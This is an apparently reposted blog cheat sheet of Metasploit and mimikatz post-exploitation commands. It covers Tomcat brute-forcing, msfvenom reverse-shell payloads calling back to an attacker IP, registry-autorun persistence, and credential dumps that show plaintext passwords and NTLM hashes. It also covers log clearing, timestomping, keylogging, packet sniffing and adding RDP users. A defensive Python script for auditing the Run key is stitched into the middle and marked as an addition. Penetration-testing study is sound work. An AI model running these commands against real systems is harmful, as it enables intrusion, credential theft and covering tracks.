Some Metasploit Framework usage techniques (continuously updated)

Foreword

A record of some Metasploit Framework usage techniques.

I. MSF

1. The Tomcat password brute-force module

use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.2.147
set RPORT 8080
run

Note: by default Tomcat locks an account after 5 failed login attempts.

2. Setting up a Windows reverse shell

1. Generate the Windows reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
// LHOST is the public IP
// LPORT is the callback port
// 4433.exe is the generated file

2. Listen on the IP and port

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run

3. Callback succeeded

meterpreter > sysinfo
Computer        : WIN-UKKED2CCSHJ
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows

meterpreter > getuid
Server username: IIS APPPOOL\padt002

3. Setting up a Linux reverse shell with msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f elf > payload.elf
// LHOST is the public IP
// LPORT is the callback port
// payload.elf is the generated file

4. Persistence with msf

Meterpreter's persistence script injects a Meterpreter agent so that Meterpreter keeps running after the system reboots.

  • For a reverse connection, the interval between connection attempts back to the attacker machine can be set.
  • For a bind connection, it can be set to bind and open the port at a specified time.

We run the persistence script so that the agent starts automatically at boot; the command is:

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105 // start at boot (-X), reconnect every 10 seconds (-i 10), use port 6666 (-p 6666), connect back to 192.168.71.105
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WUST-3E75F1D708_20160106.3022/WUST-3E75F1D708_20160106.3022.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666
[*] Persistent agent script is 148426 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[+] Agent executed with PID 1308
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
meterpreter >
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 2 opened (192.168.71.105:6666 -> 192.168.71.112:1086) at 2016-01-06 20:30:26 +0800

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.71.112 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  2   meterpreter x86/win32  WUST-3E75F1D708\Administrator @ WUST-3E75F1D708  192.168.71.105:6666 -> 192.168.71.112:1086 (192.168.71.112)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

The autostart script is under C:\Documents and Settings\Administrator\Local Settings\Temp. Once persistence is in place, the session can be reopened directly from msf next time:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.71.105
lhost => 192.168.71.105
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > run

[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 3 opened (192.168.71.105:6666 -> 192.168.71.112:1098) at 2016-01-06 21:05:58 +0800
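From the defender's side, the run above leaves a clear footprint: a randomly named value under the HKCU Run key pointing at a .vbs in the user's Temp directory. The following Python script is an added example (not part of the original post) that audits a `reg export` of that key for exactly this pattern; the .reg text is constructed, reusing the value name and path from the output above.

```python
import re

# Constructed sample of `reg export` output for the HKCU Run key (not real data).
# The second value mimics the page's persistence run: random name, .vbs in Temp.
SAMPLE_RUN_KEY = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"DNXmKhNlKXyA"="C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\SIjvSmRq.vbs"
"Updater"="wscript.exe //B \"C:\\Users\\admin\\AppData\\Local\\Temp\\upd.vbs\""
'''

VALUE_LINE = re.compile(r'^"([^"]+)"="(.*)"$')
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)\b", re.I)
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.I)

def parse_run_values(reg_text):
    """Return (value name, command) pairs from a .reg export of a Run key."""
    values = []
    for line in reg_text.splitlines():
        m = VALUE_LINE.match(line.strip())
        if m:  # .reg files escape backslashes and double quotes; undo that
            data = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
            values.append((m.group(1), data))
    return values

def looks_random(name):
    """Heuristic for generated names such as DNXmKhNlKXyA: letters only,
    8+ chars, and the letter case flips on at least half of adjacent pairs."""
    if len(name) < 8 or not name.isalpha():
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return flips >= len(name) // 2

def audit_run_key(reg_text):
    """Map each suspicious Run value name to the reasons it was flagged."""
    findings = {}
    for name, command in parse_run_values(reg_text):
        reasons = []
        if SCRIPT_EXT.search(command):
            reasons.append("autorun launches a script file")
        if TEMP_DIR.search(command):
            reasons.append("payload lives in a Temp directory")
        if looks_random(name):
            reasons.append("value name looks machine-generated")
        if reasons:
            findings[name] = reasons
    return findings
```

The same check applies to the HKLM Run key and the per-user RunOnce keys; the cleanup resource file that the script logs under /root/.msf4/logs/persistence/ records the exact value it installed.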

II. mimikatz

1. Retrieving passwords, method 1

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;334101  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
0;49101   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101   NTLM
0;999     NTLM       WORKGROUP     CHENGLEE-PC$
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

2. Retrieving passwords, method 2

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey    : 0648ced51b6060bed1a3654e0ee0fd93

Rid  : 500
User : Administrator
LM   :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 501
User : Guest
LM   :
NTLM :

Rid  : 1000
User : chenglee
LM   :
NTLM : 8d0f8e1a18236379538411a9056799f5

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }

meterpreter >
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }

3. wdigest

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101   NTLM
0;999     NTLM       WORKGROUP     CHENGLEE-PC$
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

4. tspkg

meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101   NTLM
0;999     NTLM       WORKGROUP     CHENGLEE-PC$
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

III. Basic Meterpreter commands

1. System commands

Basic system commands

sessions // sessions -h shows help
sessions -l // list current sessions
sessions -i <ID> // interact with a session
sessions -k // kill a session
background // send the current session to the background
run // run an existing module; type run and press tab twice to list the available scripts
info // show information about an existing module
getuid // show current privileges
getpid // get the PID of the current process
sysinfo // show target system information
ps // list currently active processes
kill <PID> // kill a process
idletime // show how long the target has been idle
reboot / shutdown // reboot / shut down
shell // drop into the target's cmd shell

execute: run a file

execute // execute a file on the target
execute -H -i -f cmd.exe // create a new cmd.exe process; -H hidden, -i interactive

clearev: clear logs

clearev  # clears the Windows application, system and security logs

2. File system commands

Basic file system commands

getwd / pwd // show the current working directory
ls // list the current directory
cd // change directory
search -f *pass* // search for files; -h shows help
cat c:\lltest\lltestpasswd.txt // show file contents
upload /tmp/hack.txt C:\lltest // upload a file to the target
download c:\lltest\lltestpasswd.txt /tmp/ // download a file to the local machine
edit c:\1.txt // edit or create a file; if it does not exist, it is created
rm C:\lltest\hack.txt // delete a file
mkdir lltest2 // can only create a folder in the current directory
rmdir lltest2 // can only delete a folder in the current directory
getlwd / lpwd // on the attacker host: show the current directory
lcd /tmp // on the attacker host: change directory

timestomp: forge timestamps

timestomp C:// -h // show help
timestomp -v C://2.txt // view timestamps
timestomp C://2.txt -f C://1.txt // copy the timestamps of 1.txt onto 2.txt

3. Network commands

Basic network commands

ipconfig / ifconfig
netstat -ano
arp
getproxy // show proxy information
route // show the routing table

portfwd: port forwarding

portfwd add -l 6666 -p 3389 -r 127.0.0.1 // forward the target's port 3389 to local port 6666

Port scanning

run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389

4. Privilege escalation

getsystem 

How getsystem works:

  • getsystem creates a new Windows service configured to run as SYSTEM; when the service starts, it connects to a named pipe.
  • getsystem spawns a process that creates the named pipe and waits for a connection from that service.
  • The Windows service is started, which establishes a connection to the named pipe.
  • The process accepts the connection and calls ImpersonateNamedPipeClient, which yields an impersonation token for the SYSTEM user.
  • It then spawns cmd.exe with the newly obtained SYSTEM impersonation token, and we have a SYSTEM-privileged process.

5. Remote desktop & screenshots

enumdesktops // list the available desktops
getdesktop // get the desktop the current meterpreter is associated with
set_desktop // set the desktop meterpreter is associated with; -h shows help
screenshot // take a screenshot
use espia // or use the espia module to take a screenshot, then type screengrab
run vnc // connect via VNC remote desktop

The getgui command

run getgui -h // show help
run getgui -e // enable remote desktop
run getgui -u lltest2 -p 123456 // add a user
run getgui -f 6661 -e // forward port 3389 to 6661

getgui is no longer recommended by the framework; use run post/windows/manage/enable_rdp instead.
When getgui adds a user, the account is sometimes created successfully but still has no permission to log in via remote desktop.

The enable_rdp script

run post/windows/manage/enable_rdp // enable remote desktop
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 // add a user
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 // forward port 3389 to 6662

The script is located at /usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb.
Reading enable_rdp.rb shows how it works: RDP is enabled by modifying the registry with reg; the user is added by invoking cmd.exe and running net user; port forwarding relies on the portfwd command.

6. Keylogging

keyscan_start // start keylogging
keyscan_dump // dump the recorded keystrokes
keyscan_stop // stop keylogging

7. Packet capture with sniffer

use sniffer
sniffer_interfaces // list network interfaces
sniffer_start 2 // select an interface and start capturing
sniffer_stats 2 // show capture status
sniffer_dump 2 /tmp/lltest.pcap // export the capture as a pcap file
sniffer_stop 2 // stop capturing

8. Hash use: dumping hashes

run post/windows/gather/smart_hashdump // dump password hashes from the SAM; requires SYSTEM privileges

Closing remarks

This recorded some MSF usage techniques.

Copyright notice: published by 玥玥 on 2021-05-16 22:13:12.
When reposting, please credit: Some Metasploit Framework usage techniques (continuously updated) | 女黑客导航